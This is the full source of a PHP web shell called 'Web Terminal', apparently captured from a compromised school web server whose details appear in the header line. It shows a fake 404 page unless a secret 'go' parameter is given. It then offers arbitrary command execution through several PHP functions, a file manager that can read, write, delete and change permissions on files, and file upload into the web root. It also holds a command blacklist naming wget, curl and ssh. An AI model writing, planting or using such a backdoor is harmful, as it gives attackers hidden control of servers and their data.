| Server IP : kowitt.ac.th / Your IP : 216.73.216.11 Web Server : Microsoft-IIS/7.5 System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586 User : IUSR ( 0) PHP Version : 5.6.31 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/inetpub/wwwroot/activity/20190114-140747/test/ |
Upload File : |
<?php
// *****************************************
// Web Terminal - A simple web-based terminal interface
// https://t.me/special_one
// *****************************************
error_reporting(0);
set_time_limit(30);
function isSafeCommand($cmd)
{
$blacklist = [
'rm ',
'mv ',
'dd ',
'shutdown',
'reboot',
'halt',
'>',
'|',
'&',
';',
'`',
'$',
'(',
')',
'{',
'}',
'chmod',
'chown',
'wget',
'curl',
'ftp',
'ssh'
];
foreach ($blacklist as $forbidden) {
if (strpos($cmd, $forbidden) !== false) return false;
}
return true;
}
function executeCommand($command)
{
if (!isSafeCommand($command)) return "Command blocked by security policy";
$methods = [
'shell_exec' => function ($c) {
return shell_exec($c . ' 2>&1');
},
'exec' => function ($c) {
exec($c . ' 2>&1', $o);
return implode("\n", $o);
},
'system' => function ($c) {
ob_start();
system($c . ' 2>&1');
return ob_get_clean();
},
'passthru' => function ($c) {
ob_start();
passthru($c . ' 2>&1');
return ob_get_clean();
},
'proc_open' => function ($c) {
$descriptors = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
$process = @proc_open($c, $descriptors, $pipes);
if (!is_resource($process)) return false;
$output = stream_get_contents($pipes[1]);
$errors = stream_get_contents($pipes[2]);
proc_close($process);
return $output . $errors;
},
'popen' => function ($c) {
$handle = @popen($c . ' 2>&1', 'r');
if (!$handle) return false;
$output = '';
while (!feof($handle)) $output .= fread($handle, 4096);
pclose($handle);
return $output;
}
];
foreach ($methods as $method => $callback) {
if (function_exists($method)) {
$result = $callback($command);
if ($result !== false && $result !== null) return $result;
}
}
$fileBasedCommands = [
'ls' => function () {
return implode("\n", scandir('.'));
},
'pwd' => function () {
return getcwd();
},
'whoami' => function () {
return get_current_user();
},
'uname' => function () {
return php_uname();
},
'php -v' => function () {
return phpversion();
},
'date' => function () {
return date('Y-m-d H:i:s');
}
];
if (isset($fileBasedCommands[$command])) return $fileBasedCommands[$command]();
if ($command === 'free -m' && file_exists('/proc/meminfo')) {
return file_get_contents('/proc/meminfo');
}
if (function_exists('shell_exec') && !ini_get('safe_mode')) {
$result = `$command 2>&1`;
if (!empty($result)) return $result;
}
return "Command execution failed (all methods disabled)";
}
function handleFileOperations()
{
$output = '';
if (isset($_POST['file_action'])) {
$action = $_POST['file_action'];
$file = $_POST['file_path'] ?? '';
$new_file = $_POST['new_file_path'] ?? '';
if (empty($file)) {
return "Error: No file specified";
}
switch ($action) {
case 'read':
if (file_exists($file)) {
$output = htmlspecialchars(file_get_contents($file));
} else {
$output = "Error: File does not exist";
}
break;
case 'write':
$content = $_POST['file_content'] ?? '';
if (file_put_contents($file, $content) !== false) {
$output = "File written successfully";
} else {
$output = "Error: Could not write to file";
}
break;
case 'delete':
if (unlink($file)) {
$output = "File deleted successfully";
} else {
$output = "Error: Could not delete file";
}
break;
case 'rename':
if (rename($file, $new_file)) {
$output = "File renamed successfully";
} else {
$output = "Error: Could not rename file";
}
break;
case 'copy':
if (copy($file, $new_file)) {
$output = "File copied successfully";
} else {
$output = "Error: Could not copy file";
}
break;
case 'move':
if (rename($file, $new_file)) {
$output = "File moved successfully";
} else {
$output = "Error: Could not move file";
}
break;
case 'chmod':
$mode = $_POST['file_mode'] ?? '';
if (is_numeric($mode) && chmod($file, octdec($mode))) {
$output = "File permissions changed successfully";
} else {
$output = "Error: Could not change file permissions";
}
break;
case 'mkdir':
if (mkdir($file)) {
$output = "Directory created successfully";
} else {
$output = "Error: Could not create directory";
}
break;
case 'rmdir':
if (rmdir($file)) {
$output = "Directory removed successfully";
} else {
$output = "Error: Could not remove directory";
}
break;
default:
$output = "Error: Unknown file operation";
}
}
return $output;
}
function handleUpload()
{
if (isset($_FILES['uploaded_file']) && $_FILES['uploaded_file']['error'] === UPLOAD_ERR_OK) {
$target_dir = './';
$target_file = $target_dir . basename($_FILES['uploaded_file']['name']);
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $target_file)) {
return "File uploaded successfully: " . htmlspecialchars(basename($_FILES['uploaded_file']['name']));
} else {
return "Error uploading file";
}
}
return '';
}
$output = '';
if (isset($_POST['cmd'])) {
$output = executeCommand($_POST['cmd']);
$output = htmlspecialchars($output, ENT_QUOTES, 'UTF-8');
}
$fileOutput = handleFileOperations();
$uploadOutput = handleUpload();
if (isset($_GET['go'])) {
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Web Terminal</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<style>
body {
background-color: #1e1e1e;
color: #e0e0e0;
}
.terminal-container {
background-color: #000;
border-radius: 5px;
padding: 15px;
height: 70vh;
overflow-y: auto;
font-family: monospace;
}
.prompt {
color: #4CAF50;
}
.command-input {
background-color: transparent;
border: none;
color: #fff;
width: 80%;
outline: none;
}
.output {
white-space: pre-wrap;
margin: 5px 0;
}
.tab-content {
padding: 15px;
background-color: #2d2d2d;
border-radius: 0 0 5px 5px;
}
.nav-tabs {
border-bottom: 1px solid #4CAF50;
}
.nav-tabs .nav-link {
color: #e0e0e0;
}
.nav-tabs .nav-link.active {
background-color: #4CAF50;
color: #fff;
border-color: #4CAF50;
}
.form-control, .input-group-text {
background-color: #333;
color: #fff;
border-color: #444;
}
textarea {
background-color: #333;
color: #fff;
border-color: #444;
min-height: 150px;
}
</style>
</head>
<body>
<div class="container mt-3">
<div class="text-center">
<h3 class="text-center">Web Terminal</h3>
<p>
Programing by Alireza | @Special_One
</p>
</div>
<ul class="nav nav-tabs" id="myTab" role="tablist">
<li class="nav-item" role="presentation">
<button class="nav-link active" id="terminal-tab" data-bs-toggle="tab" data-bs-target="#terminal-tab-pane" type="button" role="tab">Terminal</button>
</li>
<li class="nav-item" role="presentation">
<button class="nav-link" id="files-tab" data-bs-toggle="tab" data-bs-target="#files-tab-pane" type="button" role="tab">File Manager</button>
</li>
<li class="nav-item" role="presentation">
<button class="nav-link" id="upload-tab" data-bs-toggle="tab" data-bs-target="#upload-tab-pane" type="button" role="tab">Upload</button>
</li>
</ul>
<div class="tab-content" id="myTabContent">
<div class="tab-pane fade show active" id="terminal-tab-pane" role="tabpanel" tabindex="0">
<div class="terminal-container" id="terminal">
<div class="output">Web Terminal - Enter commands below</div>
<?php if (!empty($output)): ?>
<div class="output"><span class="prompt">$</span> <?= htmlspecialchars($_POST['cmd'], ENT_QUOTES) ?></div>
<div class="output"><?= $output ?></div>
<?php endif; ?>
</div>
<form method="post" class="mt-2">
<div class="input-group">
<span class="input-group-text prompt">$</span>
<input type="text" class="form-control command-input" name="cmd" autocomplete="off" autofocus required>
<button type="submit" class="btn btn-success">Run</button>
</div>
</form>
</div>
<div class="tab-pane fade" id="files-tab-pane" role="tabpanel" tabindex="0">
<?php if (!empty($fileOutput)): ?>
<div class="alert alert-info"><?= $fileOutput ?></div>
<?php endif; ?>
<div class="row">
<div class="col-md-6">
<h5>File Operations</h5>
<form method="post">
<div class="mb-3">
<label class="form-label">Action</label>
<select name="file_action" class="form-select">
<option value="read">Read File</option>
<option value="write">Write File</option>
<option value="delete">Delete File</option>
<option value="rename">Rename File</option>
<option value="copy">Copy File</option>
<option value="move">Move File</option>
<option value="chmod">Change Permissions</option>
<option value="mkdir">Create Directory</option>
<option value="rmdir">Remove Directory</option>
</select>
</div>
<div class="mb-3">
<label class="form-label">File Path</label>
<input type="text" name="file_path" class="form-control" required>
</div>
<div class="mb-3" id="new-file-group" style="display: none;">
<label class="form-label">New File Path</label>
<input type="text" name="new_file_path" class="form-control">
</div>
<div class="mb-3" id="file-content-group" style="display: none;">
<label class="form-label">File Content</label>
<textarea name="file_content" class="form-control"></textarea>
</div>
<div class="mb-3" id="file-mode-group" style="display: none;">
<label class="form-label">Permissions (e.g., 755)</label>
<input type="text" name="file_mode" class="form-control">
</div>
<button type="submit" class="btn btn-primary">Execute</button>
</form>
</div>
<div class="col-md-6">
<h5>Current Directory Contents</h5>
<div class="terminal-container">
<?php
$files = scandir('.');
echo "<pre>";
foreach ($files as $file) {
$perms = fileperms($file);
$type = is_dir($file) ? 'd' : '-';
$info = sprintf("%s%s %s %s %8s %s %s\n",
$type,
$perms & 0x0100 ? 'r' : '-',
$perms & 0x0080 ? 'w' : '-',
$perms & 0x0040 ? 'x' : '-',
filesize($file),
date("Y-m-d H:i:s", filemtime($file)),
$file
);
echo htmlspecialchars($info);
}
echo "</pre>";
?>
</div>
</div>
</div>
</div>
<div class="tab-pane fade" id="upload-tab-pane" role="tabpanel" tabindex="0">
<?php if (!empty($uploadOutput)): ?>
<div class="alert alert-info"><?= $uploadOutput ?></div>
<?php endif; ?>
<h5>File Upload</h5>
<form method="post" enctype="multipart/form-data">
<div class="mb-3">
<label class="form-label">Select file to upload:</label>
<input type="file" name="uploaded_file" class="form-control">
</div>
<button type="submit" class="btn btn-primary">Upload File</button>
</form>
</div>
</div>
</div>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
<script>
const terminal = document.getElementById('terminal');
if (terminal) terminal.scrollTop = terminal.scrollHeight;
const cmdInput = document.querySelector('[name="cmd"]');
let history = [];
let historyPos = 0;
cmdInput.addEventListener('keydown', (e) => {
if (e.key === 'ArrowUp') {
if (historyPos < history.length) {
e.preventDefault();
cmdInput.value = history[historyPos++];
}
} else if (e.key === 'ArrowDown') {
if (historyPos > 0) {
e.preventDefault();
cmdInput.value = history[--historyPos];
}
} else if (e.key === 'Enter') {
history.unshift(cmdInput.value);
historyPos = 0;
}
});
// Show/hide form fields based on selected action
document.querySelector('[name="file_action"]').addEventListener('change', function() {
const action = this.value;
document.getElementById('new-file-group').style.display =
(action === 'rename' || action === 'copy' || action === 'move') ? 'block' : 'none';
document.getElementById('file-content-group').style.display =
(action === 'write') ? 'block' : 'none';
document.getElementById('file-mode-group').style.display =
(action === 'chmod') ? 'block' : 'none';
});
</script>
</body>
</html>
<?php
} else {
echo '
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>';
} ?>